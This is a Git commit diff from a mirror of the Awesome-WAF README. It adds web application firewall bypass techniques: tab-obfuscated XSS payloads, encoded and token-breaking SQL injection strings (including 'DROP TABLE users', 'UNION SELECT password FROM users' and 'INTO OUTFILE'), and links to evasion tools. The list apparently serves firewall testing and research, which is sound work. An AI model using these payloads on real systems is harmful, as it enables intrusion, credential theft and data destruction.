Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

New tool and some bypass methodologies

Browse Source
This commit is contained in:
Infected Drake 2019-06-08 23:00:15 +05:30 committed by GitHub
parent b73e02019c
commit 22a5ab8d53
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
README.md
View File

@ -2426,7 +2426,7 @@ An exotic payload crafted:
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
```
__12. Random Tabs__
__12. Tabs and Line Feeds__
- Tabs often help to evade firewalls especially regex based ones.
- Tabs can help break firewall regex when the regex is expecting whitespaces and not tabs.
@ -2434,13 +2434,30 @@ __Standard__: `<IMG SRC="javascript:alert();">`
__Bypassed__: `<IMG SRC=" javascript:alert();">`
__Variant__: `<IMG SRC=" jav ascri pt:alert ();">`
__Standard__: `http://test.com/test?id=1 union select 1,2,3`
__Standard__: `http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`
__Standard__: `<iframe src=javascript:alert(1)></iframe>`
__Obfuscated__:
```
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
```
__13. Obfuscation in Other Formats__
__13. Token Breakers__
- Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
__Case__: Unknown Token for the Tokenizer
__Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
__Payload 1__: `?id=123);DROP TABLE users --`
__Payload 2__: `?id=1337) INTO OUTFILE xxx --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
__14. Obfuscation in Other Formats__
- Many web applications support different encoding types and can interpret the encoding (see below).
- Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in.
@ -2581,6 +2598,9 @@ Payload examples:
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
```
__Standard__: `<a href="javascript:alert()">`
__Obfuscated__: `<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>`
__Variant__: `<a 0x00 href="javascript:alert(1)">clickme</a>`
#### Parsing Bugs:
- RFC states that NodeNames cannot begin with whitespace.
@ -3186,6 +3206,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
### Evasion:
- [WAFNinja](https://github.com/khalilbijjou/wafninja) - A smart tool which fuzzes and can suggest bypasses for a given WAF by [@khalilbijjou](https://github.com/khalilbijjou/).
- [WAFTester](https://github.com/Raz0r/waftester) - Another tool which can obfuscate payloads to bypass WAFs by [@Raz0r](https://github.com/Raz0r/).
- [libinjection-fuzzer](https://github.com/migolovanov/libinjection-fuzzer) - A fizzer intended for finding `libinjection` bypasses but can be probably used universally.
- [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) - A tool which searches for old DNS records for finding actual site behind the WAF.
- [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap) - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.